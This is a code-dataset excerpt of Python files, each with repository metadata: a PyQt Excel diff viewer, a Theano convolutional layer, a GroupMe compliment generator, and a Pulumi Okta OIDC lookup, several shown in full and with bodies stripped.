self.openOldAct.setShortcut('Ctrl+O')
self.openOldAct.setStatusTip("打开旧版文件用于比较")
self.openOldAct.triggered.connect(self.openOldFile)
self.openNewAct = QAction(QIcon("icon/opennew.ico"),'打开新文件', self)
self.openNewAct.setShortcut('Ctrl+N')
self.openNewAct.setStatusTip("打开新的文件用于比较")
self.openNewAct.triggered.connect(self.openNewFile)
self.showRowDiffWinAct = QAction('打开行改动窗口', self)
self.showRowDiffWinAct.setStatusTip("打开行改动窗口")
self.showRowDiffWinAct.triggered.connect(self.RowDiffDock.show)
self.showColDiffWinAct = QAction('打开列改动窗口', self)
self.showColDiffWinAct.setStatusTip("打开列改动窗口")
self.showColDiffWinAct.triggered.connect(self.ColDiffDock.show)
self.showCellDiffWinAct = QAction('打开格改动窗口', self)
self.showCellDiffWinAct.setStatusTip("打开格改动窗口")
self.showCellDiffWinAct.triggered.connect(self.CellDiffDock.show)
self.saveWinAct = QAction('保存当前窗口状态', self)
self.saveWinAct.setStatusTip("保存当前窗口状态")
self.saveWinAct.triggered.connect(self.saveToWinSetting)
self.restoreWinAct = QAction('读取窗口状态', self)
self.restoreWinAct.setStatusTip("读取窗口状态")
self.restoreWinAct.triggered.connect(self.restoreToWinSetting)
self.restoreInitWinAct = QAction('恢复默认窗口状态', self)
self.restoreInitWinAct.setStatusTip("恢复默认窗口状态")
self.restoreInitWinAct.triggered.connect(self.restoreToWinInit)
self.zoomInAct = QAction(QIcon("icon/zoom-in.png"),'增加字体大小', self)
self.zoomInAct.setShortcut(QKeySequence.ZoomIn)
self.zoomInAct.setStatusTip("增加字体大小")
self.zoomInAct.triggered.connect(self.zoomIn)
self.zoomOutAct = QAction(QIcon("icon/zoom-out.png"),'减少字体大小', self)
self.zoomOutAct.setShortcut(QKeySequence.ZoomOut)
self.zoomOutAct.setStatusTip("减少字体大小")
self.zoomOutAct.triggered.connect(self.zoomOut)
self.chooseFontAct = QAction(QIcon("icon/chafont.png"),'选择表格字体', self)
self.chooseFontAct.setStatusTip("选择表格字体")
self.chooseFontAct.triggered.connect(self.chooseFont)
self.restoreFontAct = QAction(QIcon("icon/refont.png"),'恢复默认字体', self)
self.restoreFontAct.setStatusTip("恢复默认字体")
self.restoreFontAct.triggered.connect(lambda : self.initFont.setPointSize(self.ps) or self.setTableFont(self.initFont))
self.chooseColorAct = QAction(QIcon("icon/chacol.png"),'更改颜色', self)
self.chooseColorAct.setStatusTip("更改表格颜色设置")
self.chooseColorAct.triggered.connect(self.chooseColor)
self.restoreColorAct = QAction(QIcon("icon/recol.png"),'恢复默认颜色', self)
self.restoreColorAct.setStatusTip("更改表格颜色设置")
self.restoreColorAct.triggered.connect(self.restoreToColorInit)
self.qssAct = QAction('切换背景', self)
self.qssAct.setStatusTip("在白天模式和夜间模式切换")
self.qssAct.triggered.connect(self.changeQSS)
def changeQSS(self):
if self.qss == True:
f = open('style.qss', 'r')
self.setStyleSheet(f.read())
self.qss = False
else:
self.setStyleSheet("")
self.qss = True
def chooseFont(self):
a = QFontDialog.getFont(self.currentFont,self)
if a[1]:
self.setTableFont(a[0])
def setTableFont(self,font):
self.currentFont = font
for widget in self.CentralWidget.OldTableWidget.TableWidgets:
widget.setFont(font)
widget.verticalHeader().setFont(font)
widget.horizontalHeader().setFont(font)
QTableWidget.resizeColumnsToContents(widget)
QTableWidget.resizeRowsToContents(widget)
for widget in self.CentralWidget.NewTableWidget.TableWidgets:
widget.setFont(font)
widget.verticalHeader().setFont(font)
widget.horizontalHeader().setFont(font)
QTableWidget.resizeColumnsToContents(widget)
QTableWidget.resizeRowsToContents(widget)
def zoomIn(self):
font = self.currentFont
size = font.pointSize()+1
if size == 200: size = size - 1
font.setPointSize(size)
self.setTableFont(font)
def zoomOut(self):
font = self.currentFont
size = font.pointSize()-1
if size == 1: size = size + 1
font.setPointSize(size)
self.setTableFont(font)
def initToolBar(self):
self.toolbar = self.addToolBar('tool')
self.toolbar.setObjectName("toolbar")
self.toolbar.addAction(self.anaAct)
self.toolbar.addSeparator()
self.toolbar.addAction(self.openOldAct)
self.toolbar.addAction(self.openNewAct)
self.CentralWidget.toolbar.addAction(self.zoomInAct)
self.CentralWidget.toolbar.addAction(self.zoomOutAct)
self.CentralWidget.toolbar.addAction(self.chooseFontAct)
self.CentralWidget.toolbar.addAction(self.restoreFontAct)
self.CentralWidget.toolbar.addSeparator()
self.CentralWidget.toolbar.addAction(self.chooseColorAct)
self.CentralWidget.toolbar.addAction(self.restoreColorAct)
self.CentralWidget.toolbar.addSeparator()
self.CentralWidget.toolbar.addAction(self.CentralWidget.UnlockAction)
def initMenu(self):
menubar = self.menuBar()
fileMenu = menubar.addMenu('文件')
anaMenu = menubar.addMenu('比较')
winMenu = menubar.addMenu('窗口')
formatMenu = menubar.addMenu('格式')
nightMenu = menubar.addMenu('切换模式')
nightMenu.addAction(self.qssAct)
openMenu = QMenu('打开', self)
openMenu.addAction(self.openOldAct)
openMenu.addAction(self.openNewAct)
fileMenu.addMenu(openMenu)
anaMenu.addAction(self.anaAct)
winMenu.addAction(self.showRowDiffWinAct)
winMenu.addAction(self.showColDiffWinAct)
winMenu.addAction(self.showCellDiffWinAct)
winMenu.addSeparator()
winMenu.addAction(self.saveWinAct)
winMenu.addAction(self.restoreWinAct)
winMenu.addAction(self.restoreInitWinAct)
formatMenu.addAction(self.zoomInAct)
formatMenu.addAction(self.zoomOutAct)
formatMenu.addSeparator()
formatMenu.addAction(self.chooseFontAct)
formatMenu.addAction(self.restoreFontAct)
formatMenu.addSeparator()
formatMenu.addAction(self.chooseColorAct)
formatMenu.addAction(self.restoreColorAct)
def openOldFile(self):
if self.isanaing == True:
QMessageBox.warning(self, "提示", "正在分析!请稍等!", QMessageBox.Ok)
return
fname = QFileDialog.getOpenFileName(self, '打开旧文件',"","Excel(*.xlsx *.xls)")
self.oldfilename = fname[0]
if fname[0] != '':
self.OpenOldThread = OpenFileThread(fname[0])
self.OpenOldThread.finished.connect(self.openOldDone)
self.OpenOldThread.start()
self.CellDiffWidget.clear()
self.RowDiffWidget.clear()
self.ColDiffWidget.clear()
self.IsAna = False
self.SheetDiff = {}
try:
self.CentralWidget.OldTableWidget.currentChanged.disconnect(self.setDiff)
except:
pass
def openNewFile(self):
if self.isanaing == True:
QMessageBox.warning(self, "提示", "正在分析!请稍等!", QMessageBox.Ok)
return
fname = QFileDialog.getOpenFileName(self, '打开新文件',"","Excel(*.xlsx *.xls)")
self.newfilename = fname[0]
if fname[0] != '':
self.OpenNewThread = OpenFileThread(fname[0])
self.OpenNewThread.finished.connect(self.openNewDone)
self.OpenNewThread.start()
self.CellDiffWidget.clear()
self.RowDiffWidget.clear()
self.ColDiffWidget.clear()
self.IsAna = False
self.SheetDiff = {}
try:
self.CentralWidget.OldTableWidget.currentChanged.disconnect(self.setDiff)
except:
pass
def openNewDone(self):
self.NewXlsx = self.OpenNewThread.Xlrd
self.CentralWidget.setNewTable(self.NewXlsx.SheetDatas)
def openOldDone(self):
self.OldXlsx = self.OpenOldThread.Xlrd
self.CentralWidget.setOldTable(self.OldXlsx.SheetDatas)
def beginAna(self):
self.Threads = []
self.ColorSettings = QSettings("ExcelDiffer", "Color");
addcol = self.ColorSettings.value("add")
delcol = self.ColorSettings.value("delcolor")
oi = self.CentralWidget.OldTableWidget.currentIndex()
ni = self.CentralWidget.NewTableWidget.currentIndex()
if oi == -1 or ni ==-1:
QMessageBox.warning(self, "提示", "请先打开Excel!", QMessageBox.Ok)
return
if self.oldfilename == self.newfilename:
QMessageBox.warning(self, "提示", "文件相同,无需比较。", QMessageBox.Ok)
return
if self.isanaing == True:
QMessageBox.warning(self, "提示", "正在分析!请稍等!", QMessageBox.Ok)
return
if self.CentralWidget.Lock == False:
reply = QMessageBox.warning(self, "确定比较吗?", "将要比较 "+self.OldXlsx.SheetDatas[oi]["name"]+" 和 "+self.NewXlsx.SheetDatas[ni]["name"], QMessageBox.Yes | QMessageBox.No, QMessageBox.No);
if reply == QMessageBox.No:
return
self.Alg["###"].setOldData(self.OldXlsx.SheetDatas[oi])
self.Alg["###"].setNewData(self.NewXlsx.SheetDatas[ni])
self.isanaing =True
thread = Thread(self)
thread.done.connect(self.doneDiffOne)
thread.window.Alg["###"].statueSignal.connect(self.bar.showMessage)
thread.start()
self.Threads.append(thread)
else:
reply = QMessageBox.warning(self, "确定比较吗?", "将要比较整个文件", QMessageBox.Yes | QMessageBox.No, QMessageBox.No);
if reply == QMessageBox.No:
return
oldcount = self.CentralWidget.OldTableWidget.count()
newcount = self.CentralWidget.NewTableWidget.count()
self.SheetDiff = {}
self.diffcount=0
self.donecount=0
self.delsheetcount = 0
self.addsheetcount = 0
# 计算删除的标签页
for i in range(oldcount):
flag = False
for j in range(newcount):
if self.CentralWidget.OldTableWidget.tabText(i) == self.CentralWidget.NewTableWidget.tabText(j):
self.diffcount = self.diffcount+1
flag = True
if flag == False:
self.CentralWidget.OldTableWidget.setTabBarColor(i,delcol)
self.delsheetcount = self.delsheetcount + 1
# 计算新增的标签页
for i in range(newcount):
flag = False
for j in range(oldcount):
if self.CentralWidget.OldTableWidget.tabText(j) == self.CentralWidget.NewTableWidget.tabText(i):
flag = True
if flag == False:
self.CentralWidget.NewTableWidget.setTabBarColor(i,addcol)
self.addsheetcount = self.addsheetcount + 1
have = False
for i in range(oldcount):
for j in range(newcount):
if self.CentralWidget.OldTableWidget.tabText(i) == self.CentralWidget.NewTableWidget.tabText(j):
have = True
self.Alg[self.CentralWidget.OldTableWidget.tabText(i)] = MyAlg()
self.Alg[self.CentralWidget.OldTableWidget.tabText(i)].setOldData(self.OldXlsx.SheetDatas[i])
self.Alg[self.CentralWidget.OldTableWidget.tabText(i)].setNewData(self.NewXlsx.SheetDatas[j])
self.isanaing =True
thread = Thread(self,self.CentralWidget.OldTableWidget.tabText(i))
thread.done.connect(self.doneDiffAll)
thread.window.Alg[self.CentralWidget.OldTableWidget.tabText(i)].statueSignal.connect(self.bar.showMessage)
thread.start()
self.Threads.append(thread)
if have == False:
QMessageBox.information(self, "提示", "没有同名Sheet需要比较!", QMessageBox.Ok)
def doneDiffAll(self,diff):
self.SheetDiff[diff["diffname"]]=diff
self.donecount = self.donecount + 1
if self.donecount == self.diffcount:
self.IsAna = True
self.isanaing =False
self.CentralWidget.OldTableWidget.currentChanged.connect(self.setDiff)
flag = True
for diffff in self.SheetDiff:
for item in self.SheetDiff[diffff]:
if len(self.SheetDiff[diffff][item]) != 0 and item != "diffname":
flag = False
if flag == True:
QMessageBox.information(self, "提示", "分析完毕!无改动!", QMessageBox.Ok)
return
oi = self.CentralWidget.OldTableWidget.currentIndex()
text = self.CentralWidget.OldTableWidget.tabText(oi)
if text in self.SheetDiff:
self.RowDiffWidget.setData(self.SheetDiff[text])
self.ColDiffWidget.setData(self.SheetDiff[text])
self.CellDiffWidget.setData(self.SheetDiff[text])
self.CentralWidget.setColor(self.SheetDiff[text])
QMessageBox.information(self, "提示", "分析完毕,共新增了"+str(self.addsheetcount)+"个标签页,删除了"+str(self.delsheetcount)+"个标签页。\n切换标签页查看差异信息!", QMessageBox.Ok)
def setDiff(self,id):
self.RowDiffWidget.clear()
self.ColDiffWidget.clear()
self.CellDiffWidget.clear()
text = self.CentralWidget.OldTableWidget.tabText(id)
if text in self.SheetDiff:
self.RowDiffWidget.setData(self.SheetDiff[text])
self.ColDiffWidget.setData(self.SheetDiff[text])
self.CellDiffWidget.setData(self.SheetDiff[text])
self.CentralWidget.setColor(self.SheetDiff[text])
def doneDiffOne(self,diff):
self.SheetDiff = diff
self.RowDiffWidget.setData(diff)
self.ColDiffWidget.setData(diff)
self.CellDiffWidget.setData(diff)
self.CentralWidget.setColor(diff)
self.IsAna = True
self.isanaing =False
self.bar.showMessage("分析完毕!")
flag = True
for item in diff:
if len(diff[item]) != 0 and item != "diffname":
flag = False
if flag == False:
QMessageBox.information(self, "提示", "分析完毕!", QMessageBox.Ok)
else:
QMessageBox.information(self, "提示", "分析完毕!无改动!", QMessageBox.Ok)
if __name__=="__main__":
app = QApplication(sys.argv)
main = MainWindow()
main.setWindowIcon(QIcon("icon/opennew.ico"))
main.show()
sys.exit(app.exec_()) | 22,472 | 102 | 753 |
00cc25d42e5c0a922ec20410dc202c6de8269caf | 2,130 | py | Python | core/layers/convolutional.py | luckylwk/neural-network-theano | 420c89e7028fcd9671866918c22a837d04387012 | [
"MIT"
] | null | null | null | core/layers/convolutional.py | luckylwk/neural-network-theano | 420c89e7028fcd9671866918c22a837d04387012 | [
"MIT"
] | null | null | null | core/layers/convolutional.py | luckylwk/neural-network-theano | 420c89e7028fcd9671866918c22a837d04387012 | [
"MIT"
] | null | null | null | import numpy as np
import theano
from ..utils.activation import *
from ..utils import weights
from .base import Layer
__all__ = [
"Convolutional2DLayer"
]
class Convolutional2DLayer(Layer):
'''
Standard Convolutional 2D Layer
'''
# -------------------- #
| 29.178082 | 119 | 0.624883 | import numpy as np
import theano
from ..utils.activation import *
from ..utils import weights
from .base import Layer
__all__ = [
"Convolutional2DLayer"
]
class Convolutional2DLayer(Layer):
'''
Standard Convolutional 2D Layer
'''
def __init__( self, kernels=8, kernelSize=(3,3), kernelStride=1, **kwargs ):
super(Convolutional2DLayer, self).__init__( name="Convolutional 2D Layer", **kwargs )
self.kernels = kernels # Int
self.kernelSize = kernelSize # Tuple
self.kernelStride = kernelStride # Int
self.filter = ( kernels, kernelStride, kernelSize[0], kernelSize[1] )
if self.verbose: self.printVerbose()
# -------------------- #
def _calcOutputDimensions( self ):
cols = ( (self.inputDim[2] - self.kernelSize[0]) / self.kernelStride + 1 )
rows = ( (self.inputDim[3] - self.kernelSize[1]) / self.kernelStride + 1 )
self.outputDim = ( self.inputDim[0], self.kernels, cols, rows )
# -------------------- #
def _initParams( self ):
self.W = theano.shared( weights.Constant(val=0.0)(self.filter), borrow=True )
self.b = theano.shared( weights.Constant(val=0.0)((self.filter[0],)), borrow=True )
print 'Debug: ', type(self.W), self.W.shape.eval() #, self.W.get_value()[:2]
self.params = [ self.W, self.b ]
# -------------------- #
def _calcOutput( self ):
# Documentation: http://deeplearning.net/software/theano/library/tensor/nnet/conv.html#theano.tensor.nnet.conv.conv2d
self.output = theano.tensor.nnet.conv.conv2d(
input=self.input,
filters=self.W,
filter_shape=(self.kernels, self.kernelStride) + self.kernelSize,
image_shape=self.inputDim,
border_mode='valid'
)
# -------------------- #
def printVerbose( self ):
print '\t --- Initialising {}'.format( self.name )
print '\t\t# Kernels: {}'.format( self.kernels )
print '\t\tKernel Size: {}'.format( self.kernelSize )
print '\t\tKernel Stride: {}'.format( self.kernelStride )
print '\t\tInput Size: {}'.format( self.inputDim )
print '\t\tOutput Size: {}'.format( self.outputDim )
# -------------------- #
# -------------------- #
| 1,732 | 0 | 121 |
d1ad0c5bb325cb4499e41ad36a0532ffc37e5ae2 | 2,613 | py | Python | compliments.py | Boijangle/GroupMe-Message-Bot | 0b70e5e04de4e5e757f7f2aa540f795a1039f7af | [
"MIT"
] | 2 | 2017-05-14T02:53:02.000Z | 2017-05-14T03:12:46.000Z | compliments.py | Boijangle/miniature-octo-happiness | 0b70e5e04de4e5e757f7f2aa540f795a1039f7af | [
"MIT"
] | 4 | 2017-07-18T22:24:12.000Z | 2018-07-23T01:07:05.000Z | compliments.py | Boijangle/GroupMe-Message-Bot | 0b70e5e04de4e5e757f7f2aa540f795a1039f7af | [
"MIT"
] | 2 | 2017-07-25T02:02:15.000Z | 2017-07-27T03:07:32.000Z | import random
| 33.075949 | 91 | 0.592423 | import random
def generate_compliment():
#part1 of the sentence---noun/subject
part1 = [
"you",
]
#part2 of the sentence--the verb/action
part2 = [
"are",
]
#part3 of the sentence--the ending(noun)
part3 = [
"extremely intuitive",
"a searcher of hidden meanings",
"sensitive and perceptive",
"gifted at reading others",
"a holder of strong convictions and beliefs",
"a person who will not compromise their ideals",
"genuinely warm and affirming by nature",
"capable of trusting your own instincts (and with good reason)",
"usually right and you usually know it",
"typically gentle and caring",
"usually have good communication skills",
"a gifted writer",
"committed and you take commitment seriously",
"the reason why I admire you deeply",
"a seeker of lifelong relationships",
"a good listener",
"deep, complex and intense",
"artistic and creative",
"a inspirator, a motivator, an achiever",
"extremely insightful about people and situations",
"a Perfectionist",
"natural nurturer",
"devoted to and protective of those they care about",
"the rarest of all types",
"an independent worker",
"in some ways, be easy-going",
"everything I want to be",
"very important to me",
"not a failure",
"special and idiosyncratic (heh, in a good way)",
"beautiful, not just outside, but deep inside as well",
"the person I want to risk myself for because God risk Himself on me",
"perfection, even the sun is jealous of the way you shine",
"so kind to others",
"a believer that there is good in this world",
"constantly racing through my mind",
"the next Victoria Secret Model",
"loved always",
"pretty, witty, and gracious",
"important",
"geniune and sincere",
"one I went to spend my time with, even the future",
"hotter than donut grease",
"a snack",
]
# this will shuffle the lists
random.shuffle(part1)
random.shuffle(part2)
random.shuffle(part3)
n = 1
# concatinate the parts of the sentences
list_of_sentences = []
for word in range(n):
try:
list_of_sentences = part1[word] + ' ' + part2[word] + ' ' + part3[word]
list_of_sentences += '.'
except IndexError:
break
return list_of_sentences
| 2,576 | 0 | 23 |
1f1bf8f5346cc8b928d9001b4cf006dae1340144 | 10,791 | py | Python | sdk/python/pulumi_okta/idp/get_oidc.py | pulumi/pulumi-okta | 83f7617a85b3d05213901773fa4e6a151ab6076b | [
"ECL-2.0",
"Apache-2.0"
] | 5 | 2019-10-29T21:59:22.000Z | 2021-11-08T12:00:24.000Z | sdk/python/pulumi_okta/idp/get_oidc.py | pulumi/pulumi-okta | 83f7617a85b3d05213901773fa4e6a151ab6076b | [
"ECL-2.0",
"Apache-2.0"
] | 109 | 2020-01-06T10:28:09.000Z | 2022-03-25T19:52:40.000Z | sdk/python/pulumi_okta/idp/get_oidc.py | pulumi/pulumi-okta | 83f7617a85b3d05213901773fa4e6a151ab6076b | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2020-09-11T16:31:04.000Z | 2020-11-24T12:23:17.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'GetOidcResult',
'AwaitableGetOidcResult',
'get_oidc',
]
@pulumi.output_type
class GetOidcResult:
"""
A collection of values returned by getOidc.
"""
@property
@pulumi.getter(name="authorizationBinding")
def authorization_binding(self) -> str:
"""
The method of making an authorization request.
"""
return pulumi.get(self, "authorization_binding")
@property
@pulumi.getter(name="authorizationUrl")
def authorization_url(self) -> str:
"""
IdP Authorization Server (AS) endpoint to request consent from the user and obtain an authorization code grant.
"""
return pulumi.get(self, "authorization_url")
@property
@pulumi.getter(name="clientId")
def client_id(self) -> str:
"""
Unique identifier issued by AS for the Okta IdP instance.
"""
return pulumi.get(self, "client_id")
@property
@pulumi.getter(name="clientSecret")
def client_secret(self) -> str:
"""
Client secret issued by AS for the Okta IdP instance.
"""
return pulumi.get(self, "client_secret")
@property
@pulumi.getter
def id(self) -> Optional[str]:
"""
id of idp.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="issuerMode")
def issuer_mode(self) -> str:
"""
Indicates whether Okta uses the original Okta org domain URL, or a custom domain URL.
"""
return pulumi.get(self, "issuer_mode")
@property
@pulumi.getter(name="issuerUrl")
def issuer_url(self) -> str:
"""
URI that identifies the issuer.
"""
return pulumi.get(self, "issuer_url")
@property
@pulumi.getter(name="jwksBinding")
def jwks_binding(self) -> str:
"""
The method of making a request for the OIDC JWKS.
"""
return pulumi.get(self, "jwks_binding")
@property
@pulumi.getter(name="jwksUrl")
def jwks_url(self) -> str:
"""
Endpoint where the keys signer publishes its keys in a JWK Set.
"""
return pulumi.get(self, "jwks_url")
@property
@pulumi.getter(name="maxClockSkew")
def max_clock_skew(self) -> int:
"""
Maximum allowable clock-skew when processing messages from the IdP.
"""
return pulumi.get(self, "max_clock_skew")
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
name of the idp.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="protocolType")
def protocol_type(self) -> str:
"""
The type of protocol to use.
"""
return pulumi.get(self, "protocol_type")
@property
@pulumi.getter
def scopes(self) -> Sequence[str]:
"""
The scopes of the IdP.
"""
return pulumi.get(self, "scopes")
@property
@pulumi.getter(name="tokenBinding")
def token_binding(self) -> str:
"""
The method of making a token request.
"""
return pulumi.get(self, "token_binding")
@property
@pulumi.getter(name="tokenUrl")
def token_url(self) -> str:
"""
IdP Authorization Server (AS) endpoint to exchange the authorization code grant for an access token.
"""
return pulumi.get(self, "token_url")
@property
@pulumi.getter
def type(self) -> str:
"""
type of idp.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="userInfoBinding")
def user_info_binding(self) -> str:
"""
The method of making a user info request.
"""
return pulumi.get(self, "user_info_binding")
@property
@pulumi.getter(name="userInfoUrl")
def user_info_url(self) -> str:
"""
Protected resource endpoint that returns claims about the authenticated user.
"""
return pulumi.get(self, "user_info_url")
# pylint: disable=using-constant-test
def get_oidc(id: Optional[str] = None,
name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetOidcResult:
"""
Use this data source to retrieve a OIDC IdP from Okta.
## Example Usage
```python
import pulumi
import pulumi_okta as okta
example = okta.idp.get_oidc(name="Example Provider")
```
:param str id: The id of the idp to retrieve, conflicts with `name`.
:param str name: The name of the idp to retrieve, conflicts with `id`.
"""
__args__ = dict()
__args__['id'] = id
__args__['name'] = name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('okta:idp/getOidc:getOidc', __args__, opts=opts, typ=GetOidcResult).value
return AwaitableGetOidcResult(
authorization_binding=__ret__.authorization_binding,
authorization_url=__ret__.authorization_url,
client_id=__ret__.client_id,
client_secret=__ret__.client_secret,
id=__ret__.id,
issuer_mode=__ret__.issuer_mode,
issuer_url=__ret__.issuer_url,
jwks_binding=__ret__.jwks_binding,
jwks_url=__ret__.jwks_url,
max_clock_skew=__ret__.max_clock_skew,
name=__ret__.name,
protocol_type=__ret__.protocol_type,
scopes=__ret__.scopes,
token_binding=__ret__.token_binding,
token_url=__ret__.token_url,
type=__ret__.type,
user_info_binding=__ret__.user_info_binding,
user_info_url=__ret__.user_info_url)
| 36.456081 | 349 | 0.643963 | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'GetOidcResult',
'AwaitableGetOidcResult',
'get_oidc',
]
@pulumi.output_type
class GetOidcResult:
"""
A collection of values returned by getOidc.
"""
def __init__(__self__, authorization_binding=None, authorization_url=None, client_id=None, client_secret=None, id=None, issuer_mode=None, issuer_url=None, jwks_binding=None, jwks_url=None, max_clock_skew=None, name=None, protocol_type=None, scopes=None, token_binding=None, token_url=None, type=None, user_info_binding=None, user_info_url=None):
if authorization_binding and not isinstance(authorization_binding, str):
raise TypeError("Expected argument 'authorization_binding' to be a str")
pulumi.set(__self__, "authorization_binding", authorization_binding)
if authorization_url and not isinstance(authorization_url, str):
raise TypeError("Expected argument 'authorization_url' to be a str")
pulumi.set(__self__, "authorization_url", authorization_url)
if client_id and not isinstance(client_id, str):
raise TypeError("Expected argument 'client_id' to be a str")
pulumi.set(__self__, "client_id", client_id)
if client_secret and not isinstance(client_secret, str):
raise TypeError("Expected argument 'client_secret' to be a str")
pulumi.set(__self__, "client_secret", client_secret)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if issuer_mode and not isinstance(issuer_mode, str):
raise TypeError("Expected argument 'issuer_mode' to be a str")
pulumi.set(__self__, "issuer_mode", issuer_mode)
if issuer_url and not isinstance(issuer_url, str):
raise TypeError("Expected argument 'issuer_url' to be a str")
pulumi.set(__self__, "issuer_url", issuer_url)
if jwks_binding and not isinstance(jwks_binding, str):
raise TypeError("Expected argument 'jwks_binding' to be a str")
pulumi.set(__self__, "jwks_binding", jwks_binding)
if jwks_url and not isinstance(jwks_url, str):
raise TypeError("Expected argument 'jwks_url' to be a str")
pulumi.set(__self__, "jwks_url", jwks_url)
if max_clock_skew and not isinstance(max_clock_skew, int):
raise TypeError("Expected argument 'max_clock_skew' to be a int")
pulumi.set(__self__, "max_clock_skew", max_clock_skew)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if protocol_type and not isinstance(protocol_type, str):
raise TypeError("Expected argument 'protocol_type' to be a str")
pulumi.set(__self__, "protocol_type", protocol_type)
if scopes and not isinstance(scopes, list):
raise TypeError("Expected argument 'scopes' to be a list")
pulumi.set(__self__, "scopes", scopes)
if token_binding and not isinstance(token_binding, str):
raise TypeError("Expected argument 'token_binding' to be a str")
pulumi.set(__self__, "token_binding", token_binding)
if token_url and not isinstance(token_url, str):
raise TypeError("Expected argument 'token_url' to be a str")
pulumi.set(__self__, "token_url", token_url)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
if user_info_binding and not isinstance(user_info_binding, str):
raise TypeError("Expected argument 'user_info_binding' to be a str")
pulumi.set(__self__, "user_info_binding", user_info_binding)
if user_info_url and not isinstance(user_info_url, str):
raise TypeError("Expected argument 'user_info_url' to be a str")
pulumi.set(__self__, "user_info_url", user_info_url)
@property
@pulumi.getter(name="authorizationBinding")
def authorization_binding(self) -> str:
"""
The method of making an authorization request.
"""
return pulumi.get(self, "authorization_binding")
@property
@pulumi.getter(name="authorizationUrl")
def authorization_url(self) -> str:
"""
IdP Authorization Server (AS) endpoint to request consent from the user and obtain an authorization code grant.
"""
return pulumi.get(self, "authorization_url")
@property
@pulumi.getter(name="clientId")
def client_id(self) -> str:
"""
Unique identifier issued by AS for the Okta IdP instance.
"""
return pulumi.get(self, "client_id")
@property
@pulumi.getter(name="clientSecret")
def client_secret(self) -> str:
"""
Client secret issued by AS for the Okta IdP instance.
"""
return pulumi.get(self, "client_secret")
@property
@pulumi.getter
def id(self) -> Optional[str]:
"""
id of idp.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="issuerMode")
def issuer_mode(self) -> str:
"""
Indicates whether Okta uses the original Okta org domain URL, or a custom domain URL.
"""
return pulumi.get(self, "issuer_mode")
@property
@pulumi.getter(name="issuerUrl")
def issuer_url(self) -> str:
"""
URI that identifies the issuer.
"""
return pulumi.get(self, "issuer_url")
@property
@pulumi.getter(name="jwksBinding")
def jwks_binding(self) -> str:
"""
The method of making a request for the OIDC JWKS.
"""
return pulumi.get(self, "jwks_binding")
@property
@pulumi.getter(name="jwksUrl")
def jwks_url(self) -> str:
"""
Endpoint where the keys signer publishes its keys in a JWK Set.
"""
return pulumi.get(self, "jwks_url")
@property
@pulumi.getter(name="maxClockSkew")
def max_clock_skew(self) -> int:
"""
Maximum allowable clock-skew when processing messages from the IdP.
"""
return pulumi.get(self, "max_clock_skew")
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
name of the idp.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="protocolType")
def protocol_type(self) -> str:
"""
The type of protocol to use.
"""
return pulumi.get(self, "protocol_type")
@property
@pulumi.getter
def scopes(self) -> Sequence[str]:
"""
The scopes of the IdP.
"""
return pulumi.get(self, "scopes")
@property
@pulumi.getter(name="tokenBinding")
def token_binding(self) -> str:
"""
The method of making a token request.
"""
return pulumi.get(self, "token_binding")
@property
@pulumi.getter(name="tokenUrl")
def token_url(self) -> str:
"""
IdP Authorization Server (AS) endpoint to exchange the authorization code grant for an access token.
"""
return pulumi.get(self, "token_url")
@property
@pulumi.getter
def type(self) -> str:
"""
type of idp.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="userInfoBinding")
def user_info_binding(self) -> str:
"""
The method of making a user info request.
"""
return pulumi.get(self, "user_info_binding")
@property
@pulumi.getter(name="userInfoUrl")
def user_info_url(self) -> str:
"""
Protected resource endpoint that returns claims about the authenticated user.
"""
return pulumi.get(self, "user_info_url")
class AwaitableGetOidcResult(GetOidcResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetOidcResult(
authorization_binding=self.authorization_binding,
authorization_url=self.authorization_url,
client_id=self.client_id,
client_secret=self.client_secret,
id=self.id,
issuer_mode=self.issuer_mode,
issuer_url=self.issuer_url,
jwks_binding=self.jwks_binding,
jwks_url=self.jwks_url,
max_clock_skew=self.max_clock_skew,
name=self.name,
protocol_type=self.protocol_type,
scopes=self.scopes,
token_binding=self.token_binding,
token_url=self.token_url,
type=self.type,
user_info_binding=self.user_info_binding,
user_info_url=self.user_info_url)
def get_oidc(id: Optional[str] = None,
name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetOidcResult:
"""
Use this data source to retrieve a OIDC IdP from Okta.
## Example Usage
```python
import pulumi
import pulumi_okta as okta
example = okta.idp.get_oidc(name="Example Provider")
```
:param str id: The id of the idp to retrieve, conflicts with `name`.
:param str name: The name of the idp to retrieve, conflicts with `id`.
"""
__args__ = dict()
__args__['id'] = id
__args__['name'] = name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('okta:idp/getOidc:getOidc', __args__, opts=opts, typ=GetOidcResult).value
return AwaitableGetOidcResult(
authorization_binding=__ret__.authorization_binding,
authorization_url=__ret__.authorization_url,
client_id=__ret__.client_id,
client_secret=__ret__.client_secret,
